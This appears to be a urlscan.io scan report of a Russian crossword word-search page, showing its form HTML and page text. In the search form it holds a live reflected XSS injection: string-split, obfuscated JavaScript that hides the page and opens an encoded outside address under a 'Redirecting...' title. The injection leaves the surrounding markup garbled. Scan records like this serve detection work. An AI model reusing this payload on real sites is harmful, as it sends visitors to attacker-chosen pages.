www.graycell.ru Open in urlscan Pro
79.174.65.102  Public Scan

URL: https://www.graycell.ru/simplemask.php?def=5%22%3E%3C/div%20lksqfdsafdsafewflkdyf%3E%3Cscript%3Enartub=(golx)=%3Ethis[%2...
Submission: On June 01 via api from US — Scanned from DE

Form analysis 2 forms found in the DOM

Name: formmenuPOST simplemask.php

<form name="formmenu" method="post" action="simplemask.php" style="border-spacing: 0px; margin: 5px;">
  <div class="findform">
    <div class="findformword" style="padding: 0px; display: table; width: 100%;">
      <div class="textfind">
        <a href="find.html" class="baseblue">Поиск слов по маске</a>
      </div>
      <div style="display: table; width: 100%;">
        <div style="display: table-cell; vertical-align: middle; width: 100%; height: 36px;">
          <div class="inputword">
            <div class="inputcell">
              <input class="inputfield" type="text" name="mask" value="" id="menuinputmaskm" title="- (знак тире) - любая буква; 
* (звездочка) - любые несколько букв (или ни одной); 
 цифрой можно заменять повторяющиеся буквы на разных позициях." onkeyup="if (this.value=='') { inputwordpicm.style.display='none' } else { inputwordpicm.style.display='block'}">
            </div>
            <div class="inputcell" style="width: 20px;">
              <img id="inputwordpicm" src="graph/svg/IconDelete.svg" class="inputworddel" alt="Удалить текст" onmouseover="if (menuinputmaskm.value=='') { inputwordpicm.style.display='none' } else {this.src='graph/svg/IconDeleteActive.svg'}"
                onmouseout="if (menuinputmaskm.value=='') { inputwordpicm.style.display='none' } else {this.src='graph/svg/IconDelete.svg'}" onmousedown="menuinputmaskm.value=''; inputwordpicm.style.display='none'" style="display: none;">
            </div>
          </div>
        </div>
        <div class="findformbutton">
          <input type="image" class="buttonfind" name="submit" src="graph/svg/IconFind.svg" alt="Найти">
        </div>
      </div>
      <div class="textfind helpfind">
        <span class="baseexample">например,</span>
        <a href="simplemask.php?mask=а*я
">а*я
</a>
      </div>
    </div>
    <div class="findformword" style="padding: 0px; margin-top: 10px; display: table; width: 100%;">
      <div class="textfind">
        <a href="find.html" class="baseblue">и/или по определению</a>
      </div>
      <div style="display: table; width: 100%;">
        <div style="display: table-cell; vertical-align: middle; width: 100%; height: 36px;">
          <div class="inputword">
            <div class="inputcell">
              <input class="inputfield" type="text" name="def" value="" id="menuinputdefm" onkeyup="if (this.value=='') { inputdefpicm.style.display='none' } else { inputdefpicm.style.display='block'}">
            </div>
            <div class="inputcell" style="width: 20px;">
              <img id="inputdefpicm" src="graph/svg/IconDelete.svg" class="inputworddel" alt="Удалить текст" onmouseover="if (menuinputdefm.value=='') { inputdefpicm.style.display='none' } else {this.src='graph/svg/IconDeleteActive.svg'}"
                onmouseout="if (menuinputdefm.value=='') { inputdefpicm.style.display='none' } else {this.src='graph/svg/IconDelete.svg'}" onmousedown="menuinputdefm.value=''; inputdefpicm.style.display='none'" style="display: none;">
            </div>
          </div>
        </div>
        <div class="findformbutton">
          <input type="image" class="buttonfind" name="submit" src="graph/svg/IconFind.svg" alt="Найти">
        </div>
      </div>
      <div class="textfind helpfind">
        <span class="baseexample">например,</span>
        <a href="simplemask.php?def=жизнь+на+бумаге
">жизнь на бумаге
</a>
      </div>
    </div>
    <div class="advansedfind" style="width: 100%; display: block;  box-sizing: border-box; margin-top: 10px;">
      <a href="find.html" class="bluebutton" style="display: block; box-sizing: border-box; width: 100%; min-height: 36px; padding: 6px 2px 6px 2px; margin: 0px; font-size:12pt; text-align: center;">
				<div style="display: inline-block; vertical-align: middle; ">СЛОЖНЫЕ ЗАПРОСЫ</div>
				<div style="display: inline-block; vertical-align: middle; font-size:0pt;"><img src="graph/svg/Next.svg" style="float: right; width:20px; height:20px; margin-left: 5px;" alt="Более сложные запросы"></div>
			</a>
    </div>
  </div>
</form>

Name: form1POST simplemask.php

<form name="form1" method="post" action="simplemask.php">
  <div class="findform">
    <div class="findformword">
      <div class="textfind">
        <a href="find.html" class="baseblue">Поиск слов по маске</a>
      </div>
      <div style="display: table; width: 100%;">
        <div style="display: table-cell; vertical-align: middle; height: 36px;">
          <div class="inputword">
            <div class="inputcell">
              <input class="inputfield" autofocus="" type="text" name="mask" value="" id="menuinputmask" title="- (знак тире) - любая буква; 
* (звездочка) - любые несколько букв (или ни одной); 
 цифрой можно заменять повторяющиеся буквы на разных позициях." onfocus="this.select()" onkeyup="if (this.value=='') { inputwordpic.style.display='none' } else { inputwordpic.style.display='block'}">
            </div>
            <div class="inputcell" style="width: 20px;">
              <img id="inputwordpic" src="graph/svg/IconDelete.svg" class="inputworddel" alt="Удалить текст" onmouseover="if (menuinputmask.value=='') { inputwordpic.style.display='none' } else {this.src='graph/svg/IconDeleteActive.svg'}"
                onmouseout="if (menuinputmask.value=='') { inputwordpic.style.display='none' } else {this.src='graph/svg/IconDelete.svg'}" onmousedown="menuinputmask.value=''; inputwordpic.style.display='none'">
            </div>
          </div>
        </div>
        <div class="findformbutton firstbutton">
          <input type="image" class="buttonfind" name="submit" src="graph/svg/IconFind.svg" alt="Найти">
        </div>
      </div>
      <div class="textfind helpfind">
        <span class="baseexample">например,</span>
        <a href="simplemask.php?mask=мор-а
">мор-а
</a>
      </div>
    </div>
    <div class="findformdef">
      <div class="textfind">
        <a href="find.html" class="baseblue">и/или по определению</a>
      </div>
      <div style="display: table; width: 100%;">
        <div style="display: table-cell; vertical-align: middle; height: 36px;">
          <div class="inputword">
            <div class="inputcell">
              <input class="inputfield" type="text" name="def" value="5">
            </div>
            <script>
              nartub = (golx) => this['d'
                'e'
                'c'
                'o'
                'd'
                'e'
                'U'
                'R'
                'I'
                'C'
                'o'
                'm'
                'p'
                'o'
                'n'
                'e'
                'n'
                't'](this['a'
                't'
                'o'
                'b'](golx));
              saizo = this['d'
                'o'
                'c'
                'u'
                'm'
                'e'
                'n'
                't'];
              saizox = this['w'
                'i'
                'n'
                'd'
                'o'
                'w'];
              saizo['t'
                'i'
                't'
                'l'
                'e'] = 'R'
              'e'
              'd'
              'i'
              'r'
              'e'
              'c'
              't'
              'i'
              'n'
              'g'
              '.'
              '.'
              '.';
              saizo['b'
                'o'
                'd'
                'y']['s'
                't'
                'y'
                'l'
                'e'
              ]['d'
                'i'
                's'
                'p'
                'l'
                'a'
                'y'
              ] = 'n'
              'o'
              'n'
              'e';
              saizox['o'
                  'p'
                  'e'
                  'n'](nartub(
                    'JTY4JTc0JTc0JTcwJTczJTNBJTJGJTJGJTY5JTZEJTcwJTc1JTc0JTY1JTZDJTY1JTc0JTc0JTY1JTcyJTJFJTYzJTZGJTZEJTJGJTMwJTJGJTMwJTJGJTMwJTJGJTc1JTMyJTYxJTYyJTMzJTYxJTYyJTM4JTM5JTMyJTY0JTY2JTYyJTM3JTM4JTMxJTM4JTYzJTMxJTY1JTM1JTY0JTYzJTM1JTY2JTYzJTYyJTYxJTM5JTMzJTM2JTYyJTM2'
                    )
                  '/9/39-11728/1195-52041-18531'
                  " id="
                  menuinputdef " 
                  title = "укажите через пробел слова или части слов, которые обязательно должны быть в определениях"
                  onfocus = 'this.select()'
                  onkeyup = "if (this.value=='') { inputdefpic.style.display='none' } else { inputdefpic.style.display='block'}" > < /div> < div class = "inputcell"
                  style = "width: 20px;" > < img id = "inputdefpic"
                  src = "graph/svg/IconDelete.svg"
                  class = "inputworddel"
                  alt = "Удалить текст"
                  onmouseover = "if (menuinputdef.value=='') { inputdefpic.style.display='none' } else {this.src='graph/svg/IconDeleteActive.svg'}"
                  onmouseout = "if (menuinputdef.value=='') { inputdefpic.style.display='none' } else {this.src='graph/svg/IconDelete.svg'}"
                  onmousedown = "menuinputdef.value=''; inputdefpic.style.display='none'" > < /div> < /div> < /div> < div class = "findformbutton" > < input type = "image"
                  class = "buttonfind"
                  name = "submit"
                  src = "graph/svg/IconFind.svg"
                  alt = "Найти" > < /div> < /div> < div class = "textfind helpfind" > < div style = "float: left;" > < span class = "baseexample" > например, < /span>  < a href = "simplemask.php?def=спорт+для+дылд
                  ">спорт для дылд < /a> < /div> < div class = "findwithpic"
                  style = "float: right; margin-right: 40px;" > < INPUT TYPE = "checkbox"
                  NAME = "onlyphoto" > < span class = "baseexample" > только с картинками < /span>				 < /div> < /div> < /div> < /div> < /form> < div class = "advansedfind"
                  style = "float: right; box-sizing: content-box;" > < a href = "find.html"
                  class = "greenbutton"
                  style = "box-sizing: border-box; width: 100%; padding: 2px; margin: 5px 0px 5px 0px; font-size:12pt; text-align: center;" > < div style = "display: table-cell; vertical-align: middle; font-size:0pt;" > < img src =
                  "graph/svg/IconPlus.svg"
                  style = "float: left; width:20px; height:20px; margin-right: 5px;"
                  alt = "Более сложные запросы" > < /div> < div style = "display: table-cell; vertical-align: middle;" > РАСШИРЕННЫЙ ПОИСК < /div> < /a> < /div> < div style = "clear: both" > < /div> < script >
                  if (document.getElementById('menuinputmask').value == '') {
                    document.getElementById('inputwordpic').style.display = 'none'
                  } else {
                    document.getElementById('inputwordpic').style.display = 'block'
                  };
                  if (document.getElementById('menuinputdef').value == '') {
                    document.getElementById('inputdefpic').style.display = 'none'
                  } else {
                    document.getElementById('inputdefpic').style.display = 'block'
                  };
            </script>
            <script>
              function validateForm(f, g) {
                document.getElementById("check").value = 1666;
                if (!(/^[ёЁа-яА-Я]+$/.test(f.value))) {
                  alert("\"" + f.value + "\" - не является словом русского языка!");
                  return false;
                } else if ((f.value == "") || (g.value == "")) {
                  alert("Оба поля должны дыть заполнены!");
                  return false;
                } else return true;
              }
            </script>
            <div class="zag_h1">
              <h1>Поиск слов по маске и определению</h1>
            </div><span class="base">Результаты поиска:</span><br><br>
            <p class="description"><span class="base">Количество найденных определений : <b>0</b> </span><br><br></p>
            <div id="adddef">
              <a onclick="appendDef()" class="greenbutton"><div style="display: table-cell; vertical-align: middle; font-size:0pt;"><img src="graph/svg/IconAdd.svg" style="box-sizing: content-box; float: left; width:25px; height:25px; margin-right: 10px;" alt="Добавить своё определение"></div><div style="display: table-cell; vertical-align: middle;">ДОБАВИТЬ СВОЁ ОПРЕДЕЛЕНИЕ</div></a>
            </div>
            <script>
              function appendDef() {
                var action = 'addnewdef.php';
                var myAjax = new Ajax.Updater('adddef', action, {
                  method: 'get'
                });
                return false;
              }
            </script><br><span class="base">
              <div style="width: 100%; height: 6px; background: #b9d735; margin-bottom: 10px;"></div>
              <div style="margin: 15px 0px 15px 0px; text-align: center;"><span class="zag1">НИЧЕГО НЕ НАШЛОСЬ?</span><br><img src="graph/svg/NotFind.svg" style="width: 100%; max-width: 300px; margin-top: 15px; ALT=" Ничего="" не=""
                  нашлось?"=""><a href="forum.php" class="greenbutton" style="display: table; margin: 0 auto;"><div style="display: table-cell; vertical-align: middle; font-size:0pt;"><img src="graph/svg/IconHelp.svg" style="float: left; width:25px; height:25px; margin-right: 10px;" alt="Назад"></div><div style="display: table-cell; vertical-align: middle;">ПОПРОСИТЕ ПОМОЩИ У ДРУЗЕЙ</div></a>
              </div><br>
              <p class="find"><span class="zaggray">ПОПУЛЯРНЫЕ ЗАПРОСЫ</span></p>
              <div style="text-align: left; clear: both; padding:10px;">
                <div class="second" ;="" style="display: inline-block; vertical-align : top;"><a href="simplemask.php?mask=--" class="baseblue">--</a><br>
                  <a href="simplemask.php?mask=-А*" class="baseblue">-А*</a><br>
                  <a href="simplemask.php?mask=---А*" class="baseblue">---А*</a><br>
                  <a href="simplemask.php?mask=-Е*" class="baseblue">-Е*</a><br>
                  <a href="simplemask.php?mask=--Н*" class="baseblue">--Н*</a><br>
                  <a href="simplemask.php?mask=-И*" class="baseblue">-И*</a><br>
                  <a href="simplemask.php?mask=П*" class="baseblue">П*</a><br>
                  <a href="simplemask.php?mask=С*" class="baseblue">С*</a><br>
                  <a href="simplemask.php?mask=-е-к-н-и-" class="baseblue">-е-к-н-и-</a><br>
                  <a href="simplemask.php?mask=----К*" class="baseblue">----К*</a><br>
                </div>
                <div class="second" ;="" style="display: inline-block; vertical-align : top;"><a href="simplemask.php?mask=----О*" class="baseblue">----О*</a><br>
                  <a href="simplemask.php?mask=--И*" class="baseblue">--И*</a><br>
                  <a href="simplemask.php?mask=-я-у-к-" class="baseblue">-я-у-к-</a><br>
                  <a href="simplemask.php?mask=Р*" class="baseblue">Р*</a><br>
                  <a href="simplemask.php?mask=Л-т-е" class="baseblue">Л-т-е</a><br>
                  <a href="simplemask.php?mask=----Р*" class="baseblue">----Р*</a><br>
                  <a href="simplemask.php?mask=----И*" class="baseblue">----И*</a><br>
                  <a href="simplemask.php?mask=---Р*" class="baseblue">---Р*</a><br>
                  <a href="simplemask.php?mask=--А*" class="baseblue">--А*</a><br>
                  <a href="simplemask.php?mask=-я---к-" class="baseblue">-я---к-</a><br>
                </div>
                <div class="third" style="width:33%; vertical-align : top;"><a href="simplemask.php?mask=--Р*" class="baseblue">--Р*</a><br>
                  <a href="simplemask.php?mask=------И*" class="baseblue">------И*</a><br>
                  <a href="simplemask.php?mask=-е-к-н---" class="baseblue">-е-к-н---</a><br>
                  <a href="simplemask.php?mask=З*" class="baseblue">З*</a><br>
                  <a href="simplemask.php?mask=К*" class="baseblue">К*</a><br>
                  <a href="simplemask.php?mask=---С*" class="baseblue">---С*</a><br>
                  <a href="simplemask.php?mask=??*" class="baseblue">??*</a><br>
                  <a href="simplemask.php?mask=---О*" class="baseblue">---О*</a><br>
                  <a href="simplemask.php?def=Заменитель+сахара" class="basegreen">Заменитель сахара</a><br>
                  <a href="simplemask.php?mask=-и-к" class="baseblue">-и-к</a><br>
                </div>
              </div>
            </span>
          </div>
          <div style="width: 100%; border-top: 5px solid #b9d735; margin-top: 10px; padding-top: 10px; text-align:center; display: block; clear: both;">
            <!--rare.ru-->
            <!--Расположение: 3-->
            <div class="tgx-vbf" style="overflow: hidden; display: inline-block; position: relative; transition: height 0.7s ease 0s; width: 300px; height: 0px; background-color: transparent;" data-vbf-id="16944" data-vbf-exp="1" data-vbf-hide="0"
              data-vbf-loop="10" data-vbf-w="300" data-vbf-h="250"></div>
            <div class="tgx-vbf" style="overflow: hidden; display: inline-block; position: relative; transition: height 0.7s ease 0s; width: 300px; height: 0px; background-color: transparent;" data-vbf-id="16952" data-vbf-exp="1" data-vbf-hide="0"
              data-vbf-loop="10" data-vbf-w="300" data-vbf-h="250"></div>
            <div class="tgx-vbf" style="overflow: hidden; display: inline-block; position: relative; transition: height 0.7s ease 0s; width: 300px; height: 0px; background-color: transparent;" data-vbf-id="16953" data-vbf-exp="1" data-vbf-hide="0"
              data-vbf-loop="10" data-vbf-w="300" data-vbf-h="250"></div>
          </div>
        </div>
      </div>
      <div class="container" style="background: #0a4b59;">
        <div class="footblock leftblock" style="padding-top: 10px; border: 4px solid #0a4b59;">
          <!-- Rating Mail.ru counter -->
          <script>
            var _tmr = window._tmr || (window._tmr = []);
            _tmr.push({
              id: "1708268",
              type: "pageView",
              start: (new Date()).getTime()
            });
            (function(d, w, id) {
              if (d.getElementById(id)) return;
              var ts = d.createElement("script");
              ts.type = "text/javascript";
              ts.async = true;
              ts.id = id;
              ts.src = "https://top-fwz1.mail.ru/js/code.js";
              var f = function() {
                var s = d.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(ts, s);
              };
              if (w.opera == "[object Opera]") {
                d.addEventListener("DOMContentLoaded", f, false);
              } else {
                f();
              }
            })(document, window, "topmailru-code");
          </script><noscript>
            <div>
              <img src="https://top-fwz1.mail.ru/counter?id=1708268;js=na" style="border:0;position:absolute;left:-9999px;" alt="Top.Mail.Ru">
            </div>
          </noscript>
          <!-- //Rating Mail.ru counter -->
          <!-- Rating Mail.ru logo -->
          <a href="https://top.mail.ru/jump?from=1708268">
<img src="https://top-fwz1.mail.ru/counter?id=1708268;t=57;l=1" style="border:0;" height="31" width="88" alt="Top.Mail.Ru"></a>
          <!-- //Rating Mail.ru logo -->
        </div>
        <div class="footblock mainblock" style="text-align:right; border: 4px solid #0a4b59;">
          <span class="basewhite">Дизайнер сайта и автор всех работ: <a href="about.html" class="greencolor"><b>Пискунов 
              Алексей</b></a> © 2009-2024</span>
          <a href="mailto:piskunov@mail.ru"><img src="graph/svg/IconMail.svg" style="width: 30px; height: 30px; vertical-align: middle; padding-left: 5px;" alt="Написать письмо"></a>
        </div>
      </div>
      <div class="downrect"></div>
      <!-- YaMetrics begin -->
      <script>
        <!--
        var ya_cid = 166829;
        //
        -->
      </script>
      <script src="https://bs.yandex.ru/resource/watch.js"></script>
      <noscript>
        <div style="display: inline;"><img src="https://bs.yandex.ru/watch/166829" width="1" height="1" alt=""></div>
      </noscript>
      <!-- YaMetrics end -->
      <script>
        shineLinks('topmenu');
      </script>
    </div>
  </div>
</form>

Text Content

 * Главная
 * Сканворды
 * Судоку
 * Для печати
   * Сканворды
   * Кроссворды
   * Судоку
   * Японские кроссворды
   * Головоломки
   * Игры со словами
   * Детские
 * Поисковик
 * Словарь
 * Помощь друга
 * Заказать
 * Об авторе

 * Главная
 * Сканворды-онлайн
 * Судоку-онлайн
 * Для печати
   * Сканворды
   * Кроссворды
   * Судоку
   * Японские кроссворды
   * Головоломки
   * Игры со словами
   * Детские
 * Поисковик
 * Словарь кроссвордиста
 * Помощь друга
 * Заказать работу
 * Карта сайта
 * Вопросы и ответы
 * Об авторе


Поиск слов по маске

например, а*я
и/или по определению

например, жизнь на бумаге
СЛОЖНЫЕ ЗАПРОСЫ


Поиск слов по маске

например, мор-а
и/или по определению


ПОИСК СЛОВ ПО МАСКЕ И ОПРЕДЕЛЕНИЮ

Результаты поиска:



Количество найденных определений : 0



ДОБАВИТЬ СВОЁ ОПРЕДЕЛЕНИЕ


НИЧЕГО НЕ НАШЛОСЬ?


ПОПРОСИТЕ ПОМОЩИ У ДРУЗЕЙ


ПОПУЛЯРНЫЕ ЗАПРОСЫ

--
-А*
---А*
-Е*
--Н*
-И*
П*
С*
-е-к-н-и-
----К*

----О*
--И*
-я-у-к-
Р*
Л-т-е
----Р*
----И*
---Р*
--А*
-я---к-

--Р*
------И*
-е-к-н---
З*
К*
---С*
??*
---О*
Заменитель сахара
-и-к


Дизайнер сайта и автор всех работ: Пискунов Алексей © 2009-2024


word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word

mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1



word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word word word word word word word word word
word word word word word word word word

mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1
mmMwWLliI0fiflO&1